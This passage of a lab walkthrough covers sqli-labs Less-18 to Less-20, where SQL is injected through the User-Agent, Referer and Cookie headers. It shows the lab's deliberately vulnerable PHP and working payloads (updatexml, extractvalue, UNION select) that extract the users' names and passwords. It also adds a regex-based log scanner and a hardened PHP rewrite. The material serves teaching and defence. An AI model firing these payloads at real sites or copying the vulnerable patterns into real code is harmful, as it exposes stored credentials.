        echo 'Your User Agent is: ' .$uagent;
        echo "</font>";
        echo "<br>";
        print_r(mysql_error());
        echo "<br><br>";
        echo '<img src="../images/flag.jpg" />';
        echo "<br>";
    }
    else
    {
        echo '<font color= "#0000ff" font size="3">';
        //echo "Try again looser";
        print_r(mysql_error());
        echo "</br>";
        echo "</br>";
        echo '<img src="../images/slap.jpg" />';
        echo "</font>";
    }
}
?>
</font>
</div>
</body>
</html>
uname and passwd are both processed by check_input(), so injecting through uname and passwd won't work, but in the code we see an INSERT:
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
It inserts the User-Agent and the IP into the database, so can we use this to inject? Modifying the IP address isn't very convenient here, but the User-Agent is easy to modify, so we start from the User-Agent.
Which tool for manual injection? Burp's Repeater is very convenient; some Firefox add-ons such as Live HTTP Headers and Tamper Data should also work. Below I use Burp Suite to demonstrate.
First, you must enter a correct username and password to pass the credential check and reach the part that processes the User-Agent. This is close to the real-world case of registering or logging in and then injecting; here, entering the correct credentials echoes back our User-Agent.
Next, use Burp Suite to intercept and modify the request to get the database name. There are many ways; build the statements:
' or updatexml(1,concat(0x2b5e,database()),0) or '
' and extractvalue(1,concat(0x7e,(database()))) and '1'='1
Skipping the step-by-step, get the username and password directly:
' or updatexml(1,concat(0x2b5e,(select concat_ws(0x2b5e,id,username,password) from users limit 0,1)),0) or '
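The lab writes every submitted value to result.txt ('User Name:', 'Password:', 'User Agent:', 'Referer:' and 'Cookie:' lines, as the sources above show), which makes that file an easy place to look for the injection attempts this page describes. Below is an added example, not from the original notes or from sqli-labs: a small Python scanner that flags log lines carrying the markers used on this page (a quote followed by or/and, union select, updatexml/extractvalue/name_const, sleep, information_schema, a trailing comment). The lines in SAMPLE_LOG are constructed from the page's own payloads plus two benign entries. One caveat visible in the Less-18 source: the lab's fwrite() stores $uname under the 'User Agent:' label, so the real header value never reaches result.txt; the example assumes a log that records the header itself.

```python
"""Added example (not sqli-labs code): scan result.txt-style lines for the SQL
injection markers discussed on this page. Rules are heuristics, not a SQL parser.
The sample log lines are constructed for this example."""
import re

# (rule name, pattern); all patterns are applied to the value after the label
RULES = [
    ("quote-boolean", re.compile(r"""['"]\)?\s*(or|and)\s+[\w'"(]""", re.I)),
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("xpath-error", re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I)),
    ("name-const", re.compile(r"\bname_const\s*\(", re.I)),
    ("time-delay", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("schema-probe", re.compile(r"\binformation_schema\b", re.I)),
    ("comment-tail", re.compile(r"(#|%23|--\s)\s*$")),
]

# the labels the lab's fwrite() calls use for each lesson
LINE_RE = re.compile(r"^(User Name|Password|User Agent|Referer|Cookie):(.*)$")


def scan_line(line):
    """Return (field, [matched rule names]) for one log line, or None when the
    line is not in the result.txt format."""
    m = LINE_RE.match(line.rstrip("\n"))
    if not m:
        return None
    field, value = m.group(1), m.group(2)
    hits = [name for name, rx in RULES if rx.search(value)]
    return field, hits


def scan_log(text, min_hits=1):
    """Scan a whole log; return [(line_no, field, hits)] for lines that match
    at least min_hits rules."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        res = scan_line(line)
        if res and len(res[1]) >= min_hits:
            findings.append((no, res[0], res[1]))
    return findings


# constructed log: two normal logins, payloads from this page, a normal UA and Referer
SAMPLE_LOG = """User Name:Dumb
Password:Dumb
User Name:user' or 1=1 #
Password:user' union select group_concat(char(32),username,char(32)),group_concat(char(32),password,char(32)) from users#
Password:a") or if(length(database())=8,1,sleep(5)) #
Password:' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#
User Agent:Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/115.0
User Agent:' or extractvalue(1,concat(0x2b5e,database())) or '
Referer:http://127.0.0.1/sqli-labs/Less-19/
"""

if __name__ == "__main__":
    for no, field, hits in scan_log(SAMPLE_LOG):
        print(f"line {no:2d} [{field}] -> {', '.join(hits)}")
```

Running the block prints lines 3, 4, 5, 6 and 8 with the rules they trigger; the normal login, the browser User-Agent and the Referer produce no hits. Raising min_hits to 2 trades recall for fewer false positives, since a single quote followed by "and" can occur in ordinary text but rarely together with a trailing comment or an XPath function call.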
Less-19: Referer header-based POST error injection
① First open the page: Welcome Dhakkan
② View the source:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-19 Header Injection- Referer- Error Based- string</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome <font color="#FF0000"> Dhakkan </font><br></div>
<div align="center" style="margin:20px 0px 0px 510px;border:20px; background-color:#0CF; text-align:center;width:400px; height:150px;">
<div style="padding-top:10px; font-size:15px;">
<!--Form to post the contents -->
<form action="" name="form1" method="post">
<div style="margin-top:15px; height:30px;">Username : <input type="text" name="uname" value=""/> </div>
<div> Password : <input type="text" name="passwd" value=""/></div></br>
<div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>
</form>
</div>
</div>
<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
<font size="3" color="#FFFF00">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

function check_input($value)
{
    if(!empty($value))
    {
        // truncation (see comments)
        $value = substr($value,0,20);
    }
    // Stripslashes if magic quotes enabled
    if (get_magic_quotes_gpc())
    {
        $value = stripslashes($value);
    }
    // Quote if not a number
    if (!ctype_digit($value))
    {
        $value = "'" . mysql_real_escape_string($value) . "'";
    }
    else
    {
        $value = intval($value);
    }
    return $value;
}

$uagent = $_SERVER['HTTP_REFERER'];
$IP = $_SERVER['REMOTE_ADDR'];
echo "<br>";
echo 'Your IP ADDRESS is: ' .$IP;
echo "<br>";
//echo 'Your User Agent is: ' .$uagent;

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname = check_input($_POST['uname']);
    $passwd = check_input($_POST['passwd']);
    /*
    echo 'Your Your User name:'. $uname;
    echo "<br>";
    echo 'Your Password:'. $passwd;
    echo "<br>";
    echo 'Your User Agent String:'. $uagent;
    echo "<br>";
    echo 'Your User Agent String:'. $IP;
    */

    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'Referer:'.$uname."\n");
    fclose($fp);

    $sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
    $result1 = mysql_query($sql);
    $row1 = mysql_fetch_array($result1);
    if($row1)
    {
        echo '<font color= "#FFFF00" font size = 3 >';
        $insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
        mysql_query($insert);
        //echo 'Your IP ADDRESS is: ' .$IP;
        echo "</font>";
        //echo "<br>";
        echo '<font color= "#0000ff" font size = 3 >';
        echo 'Your Referer is: ' .$uagent;
        echo "</font>";
        echo "<br>";
        print_r(mysql_error());
        echo "<br><br>";
        echo '<img src="../images/flag.jpg" />';
        echo "<br>";
    }
    else
    {
        echo '<font color= "#0000ff" font size="3">';
        //echo "Try again looser";
        print_r(mysql_error());
        echo "</br>";
        echo "</br>";
        echo '<img src="../images/slap.jpg" />';
        echo "</font>";
    }
}
?>
</font>
</div>
</body>
</html>
From the source we can see that what is read is HTTP_REFERER, which is basically the same as Less-18, so we modify the Referer.
To get the username and password, it is the same as before:
' or updatexml(1,concat(0x2b5e,(select concat_ws(char(32,44,32),id,username,password) from users limit 0,1)),1) or'
This time, however, we use another function:
EXTRACTVALUE (XML_document, XPath_string);
First parameter: XML_document, a String, the name of the XML document object (Doc in the documentation)
Second parameter: XPath_string (a string in XPath format).
Purpose: returns a string containing the queried value from the target XML
' or extractvalue(1,concat(0x2b5e,(select concat_ws(char(32,44,32),id,username,password) from users limit 0,1))) or'
The returned result is the same, so no screenshot here.
Less-20: Error-based Cookie header POST injection
① First open the page: Welcome Dhakkan
② View the source:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-20 Cookie Injection- Error Based- string</title>
</head>
<body bgcolor="#000000">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

if(!isset($_COOKIE['uname']))
{
    //including the Mysql connect parameters.
    include("../sql-connections/sql-connect.php");
    echo "<div style=' margin-top:20px;color:#FFF; font-size:24px; text-align:center'> Welcome <font color='#FF0000'> Dhakkan </font><br></div>";
    echo "<div align='center' style='margin:20px 0px 0px 510px;border:20px; background-color:#0CF; text-align:center;width:400px; height:150px;'>";
    echo "<div style='padding-top:10px; font-size:15px;'>";
    echo "<!--Form to post the contents -->";
    echo '<form action=" " name="form1" method="post">';
    echo ' <div style="margin-top:15px; height:30px;">Username : ';
    echo ' <input type="text" name="uname" value=""/> </div>';
    echo ' <div> Password : ';
    echo ' <input type="text" name="passwd" value=""/></div></br>';
    echo ' <div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>';
    echo '</form>';
    echo '</div>';
    echo '</div>';
    echo '<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">';
    echo '<font size="3" color="#FFFF00">';
    echo '<center><br><br><br>';
    echo '<img src="../images/Less-20.jpg" />';
    echo '</center>';

    function check_input($value)
    {
        if(!empty($value))
        {
            $value = substr($value,0,20); // truncation (see comments)
        }
        if (get_magic_quotes_gpc()) // Stripslashes if magic quotes enabled
        {
            $value = stripslashes($value);
        }
        if (!ctype_digit($value)) // Quote if not a number
        {
            $value = "'" . mysql_real_escape_string($value) . "'";
        }
        else
        {
            $value = intval($value);
        }
        return $value;
    }

    echo "<br>";
    echo "<br>";
    if(isset($_POST['uname']) && isset($_POST['passwd']))
    {
        $uname = check_input($_POST['uname']);
        $passwd = check_input($_POST['passwd']);
        $sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
        $result1 = mysql_query($sql);
        $row1 = mysql_fetch_array($result1);
        $cookee = $row1['username'];
        if($row1)
        {
            echo '<font color= "#FFFF00" font size = 3 >';
            setcookie('uname', $cookee, time()+3600);
            header ('Location: index.php');
            echo "I LOVE YOU COOKIES";
            echo "</font>";
            echo '<font color= "#0000ff" font size = 3 >';
            //echo 'Your Cookie is: ' .$cookee;
            echo "</font>";
            echo "<br>";
            print_r(mysql_error());
            echo "<br><br>";
            echo '<img src="../images/flag.jpg" />';
            echo "<br>";
        }
        else
        {
            echo '<font color= "#0000ff" font size="3">';
            //echo "Try again looser";
            print_r(mysql_error());
            echo "</br>";
            echo "</br>";
            echo '<img src="../images/slap.jpg" />';
            echo "</font>";
        }
    }
    echo "</font>";
    echo '</font>';
    echo '</div>';
}
else
{
    if(!isset($_POST['submit']))
    {
        $cookee = $_COOKIE['uname'];
        $format = 'D d M Y - H:i:s';
        $timestamp = time() + 3600;
        echo "<center>";
        echo '<br><br><br>';
        echo '<img src="../images/Less-20.jpg" />';
        echo "<br><br><b>";
        echo '<br><font color= "red" font size="4">';
        echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
        echo "</font><br>";
        echo '<font color= "cyan" font size="4">';
        echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];
        echo "</font><br>";
        echo '<font color= "#FFFF00" font size = 4 >';
        echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br>";
        echo '<font color= "orange" font size = 5 >';
        echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
        echo "<br></font>";
        $sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
        $result=mysql_query($sql);
        if (!$result)
        {
            die('Issue with your mysql: ' . mysql_error());
        }
        $row = mysql_fetch_array($result);
        if($row)
        {
            echo '<font color= "pink" font size="5">';
            echo 'Your Login name:'. $row['username'];
            echo "<br>";
            echo '<font color= "grey" font size="5">';
            echo 'Your Password:' .$row['password'];
            echo "</font></b>";
            echo "<br>";
            echo 'Your ID:' .$row['id'];
        }
        else
        {
            echo "<center>";
            echo '<br><br><br>';
            echo '<img src="../images/slap1.jpg" />';
            echo "<br><br><b>";
            //echo '<img src="../images/Less-20.jpg" />';
        }
        echo '<center>';
        echo '<form action="" method="post">';
        echo '<input type="submit" name="submit" value="Delete Your Cookie!" />';
        echo '</form>';
        echo '</center>';
    }
    else
    {
        echo '<center>';
        echo "<br>";
        echo "<br>";
        echo "<br>";
        echo "<br>";
        echo "<br>";
        echo "<br>";
        echo '<font color= "#FFFF00" font size = 6 >';
        echo " Your Cookie is deleted";
        setcookie('uname', $row1['username'], time()-3600);
        header ('Location: index.php');
        echo '</font></center></br>';
    }
    echo "<br>";
    echo "<br>";
    //header ('Location: main.php');
    echo "<br>";
    echo "<br>";
    //echo '<img src="../images/slap.jpg" /></center>';

    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'Cookie:'.$cookee."\n");
    fclose($fp);
}
?>
</body>
</html>
Reading the code: it first checks whether the uname cookie exists. If it does not, the POST credentials go through check_input(), the login query runs, and the resulting username is set as the cookie. If the cookie does exist, there are two cases:
Case one: you have logged in, the cookie is still valid, and you have not pressed the delete-cookie button. The page then prints all sorts of information (user agent, IP, cookie, and the row looked up by the cookie), plus the delete-cookie button.
Case two: you pressed the delete-cookie button. The backend sets the cookie's expiry to a time in the past, so the cookie is deleted.
The important point is that in case one the cookie value is taken straight from the Cookie header and placed inside the query without going through check_input() and without escaping, and mysql_error() is printed to the page, which is what makes error-based injection possible here.
Key code:
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
So, without further ado, let's get it done in one go:
-admin' union select 1,group_concat(char(32),username,char(32)),group_concat(char(32),password,char(32)) from users--+
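For the defensive side of the same lesson, here is the cookie lookup rewritten with a bound parameter and with the cookie itself authenticated, so the value from the Cookie header can no longer change the statement text. This is an added example, not code from sqli-labs; it reuses the lab's users table (id, username, password) but the $pdo connection values, the $secret key and the helper names are assumptions.

```php
<?php
// Added example, not part of sqli-labs. Hardened version of the Less-20
// cookie lookup. The "users" table and its columns come from the lab;
// connection details and the signing key below are placeholders.
declare(strict_types=1);

// Lab's own query, for comparison (the cookie value is concatenated raw):
//   $sql = "SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
//
// Hardened lookup: the cookie value is bound as a parameter, so the
// statement text is fixed and the value is only ever treated as data.
function lookup_user_safe(PDO $pdo, string $username): ?array
{
    $stmt = $pdo->prepare(
        'SELECT id, username, password FROM users WHERE username = :uname LIMIT 1'
    );
    $stmt->execute([':uname' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Defence in depth: instead of trusting a bare username in the cookie,
// issue an HMAC-signed value and reject anything that does not verify.
// $secret is a server-side key (assumed to be loaded from configuration).
function issue_cookie(string $username, string $secret): string
{
    $mac = hash_hmac('sha256', $username, $secret);
    return base64_encode($username) . '.' . $mac;
}

function verify_cookie(string $cookie, string $secret): ?string
{
    $parts = explode('.', $cookie, 2);
    if (count($parts) !== 2) {
        return null;
    }
    $username = base64_decode($parts[0], true);
    if ($username === false) {
        return null;
    }
    $expected = hash_hmac('sha256', $username, $secret);
    // Constant-time comparison so the MAC check leaks no timing signal.
    return hash_equals($expected, $parts[1]) ? $username : null;
}

// Request handling for the "cookie already set" branch of the lab.
$secret = 'replace-with-a-server-side-key'; // placeholder, not a real key

if (isset($_COOKIE['uname'])) {
    $username = verify_cookie($_COOKIE['uname'], $secret);
    if ($username === null) {
        // Tampered or malformed cookie: clear it, log it, stop here.
        setcookie('uname', '', time() - 3600);
        error_log('rejected unverifiable uname cookie from ' . $_SERVER['REMOTE_ADDR']);
        http_response_code(400);
        exit;
    }

    // Connection values are placeholders; ERRMODE_EXCEPTION means database
    // errors surface as exceptions to be logged, never echoed to the client.
    $pdo = new PDO(
        'mysql:host=localhost;dbname=security;charset=utf8mb4',
        'db_user',
        'db_password',
        [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]
    );

    try {
        $row = lookup_user_safe($pdo, $username);
    } catch (PDOException $e) {
        error_log('user lookup failed: ' . $e->getMessage());
        http_response_code(500);
        exit;
    }

    echo $row
        ? 'Your Login name: ' . htmlspecialchars($row['username'], ENT_QUOTES, 'UTF-8')
        : 'unknown user';
}
```

Two things change compared with the lab code. First, the query no longer contains the cookie value at all, so there is nothing for a UNION or extractvalue() payload to attach to. Second, database errors are logged server-side rather than printed with print_r(mysql_error()), which closes the error-based channel the lesson relies on. Note also that the lab's mysql_* functions and get_magic_quotes_gpc() no longer exist in current PHP (mysql_* was removed in PHP 7.0, get_magic_quotes_gpc() in PHP 8.0), so the lab source only runs on an old PHP 5 stack.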
If you have any questions, feel free to reply in the comments.
Reference links:
http://blog.csdn.net/u012763794/article/details/51361152
http://www.cnblogs.com/lcamry/p/5763024.html